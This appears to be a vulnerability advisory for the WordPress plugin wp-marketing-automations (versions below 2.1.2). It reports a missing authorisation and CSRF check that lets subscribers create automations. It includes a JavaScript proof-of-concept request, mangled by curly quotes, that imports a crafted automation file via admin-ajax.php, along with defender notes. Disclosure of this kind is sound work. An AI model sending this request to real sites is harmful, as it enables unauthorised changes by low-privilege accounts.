4.3 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
The plugin does not have authorisation and CSRF checks in one of its AJAX actions, allowing any authenticated user, such as a subscriber, to create automations.
// Proof-of-concept request for the missing authorisation/CSRF check described
// above: a multipart POST to admin-ajax.php with
// action=bwf_import_automations_json_file, carrying a single "file" part (a
// JSON automation export) and nothing else — no nonce field is appended.
// The response body is logged to the console. Run from a browser page on the
// site, the relative URL presumably rides on the existing logged-in session
// cookies, which is why a subscriber-level account suffices (see the summary).
// Defender notes: the handler should be gated by a capability check
// (current_user_can) and nonce verification (check_ajax_referer); versions
// before 2.1.2 are listed as affected in the table below. For detection,
// review admin-ajax.php requests with this action from non-administrator
// accounts.
// NOTE(review): reproduced verbatim from the advisory paste; the HTML e-mail
// template inside the payload is partially lost where the paste wraps.
var data = new FormData() data.append(‘file’,new Blob(['[{“data”:{“source”:“wp”,“event”:“wp_user_login”,“start”:“1”,“v”:“2”},“meta”:{“title”:“t”,“event_meta”:“”,“actions”:“”,“a_track_id”:0,“condition”:“”,“run_count”:0,“ui”:“”,“requires_update”:0,“uiData”:“”,“steps”:[{“id”:“start”,“type”:“start”,“data”:{“icon”:“rocket”,“event”:“wp_user_login”,“evtGroup”:“wp”,“count”:0,“note”:“”},“hidden”:false,“position”:{“x”:0.0004269199384684752,“y”:-23.5},“targetPosition”:“top”,“sourcePosition”:“bottom”,“hasMultiParents”:false},{“id”:“end”,“type”:“end”,“data”:{“label”:“End Automation”},“hidden”:false,“position”:{“x”:0.00015686161315141622,“y”:357.5},“targetPosition”:“top”,“sourcePosition”:“bottom”,“hasMultiParents”:false},{“id”:“3”,“type”:“action”,“stepId”:1,“step_status”:2,“hidden”:false,“data”:[],“position”:{“x”:0.0007870621141599978,“y”:159.5},“targetPosition”:“top”,“sourcePosition”:“bottom”,“hasMultiParents”:false}],“links”:[{“id”:“endlink”,“source”:“3”,“target”:“end”,“sourceHandle”:“”,“animated”:false,“label”:“”,“isHidden”:false},{“id”:“2-3”,“source”:“start”,“label”:“”,“target”:“3”,“sourceHandle”:“”,“animated”:false}],“count”:“3”,“step_iteration_array”:{“1”:[{“next”:“end”,“type”:“end”}],“start”:[{“next”:1,“type”:“action”}]}},“step_data”:{“1”:{“ID”:“1”,“aid”:“1”,“type”:“2”,“action”:“{\"action\":\"wp_sendemail\",\"intergration\":\"wp\"}”,“status”:“1”,“data”:"{\"sidebarData\":{\"bwfan_email_to\":\"[email protected]\",\"bwfan_email_data\":{\"subject\":\"test\",\"data\":{\"preheader\":\"\",\"utmEnabled\":false,\"utm\":{\"source\":\"Newsletter\",\"medium\":\"email\",\"name\":\"\",\"content\":\"\",\"term\":\"\"},\"isTransactional\":false,\"overrideSenderInfo\":false},\"mode\":1,\"template\":\"<\\\\\/p>Hi {{contact_first_name}},<\\\\\/p>
<\\\\\/p>
{{business_name}}, {{business_address}}<\\\\\/span>
[unsubscribe<\\\\\/a><\\\\\/span><\\\\\/p>\"}}}",“created_at”:“2022-07-10 13:11:27”,“updated_at”:“2022-07-10 13:12:56”}}}]‘]),‘x’) fetch(’/wp-admin/admin-ajax.php?action=bwf_import_automations_json_file’, { method: ‘POST’, body: data }).then(response => response.text()) .then(data => console.log(data));
CPE | Name | Operator | Version |
---|---|---|---|
wp-marketing-automations | lt | 2.1.2 |